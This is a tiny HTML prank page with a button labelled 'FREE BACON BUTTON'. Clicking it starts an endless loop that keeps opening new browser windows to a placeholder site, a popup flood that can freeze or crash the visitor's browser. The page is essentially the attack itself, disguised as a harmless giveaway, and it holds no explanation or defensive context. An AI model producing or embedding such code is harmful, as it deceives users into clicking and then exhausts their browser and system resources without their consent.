<!DOCTYPE html> <html> <head> <style> body { background-image: url("somebaconimage.gif"); } </style> </head> <body> <button onclick="myFunction();">FREE BACON BUTTON</button> <script> function myFunction() { while (1==1){ window.open("http://somewebsite.com"); window.open("http://somewebsite.com"); window.open("http://somewebsite.com"); window.open("http://somewebsite.com"); window.open("http://somewebsite.com"); } } </script> </body> </html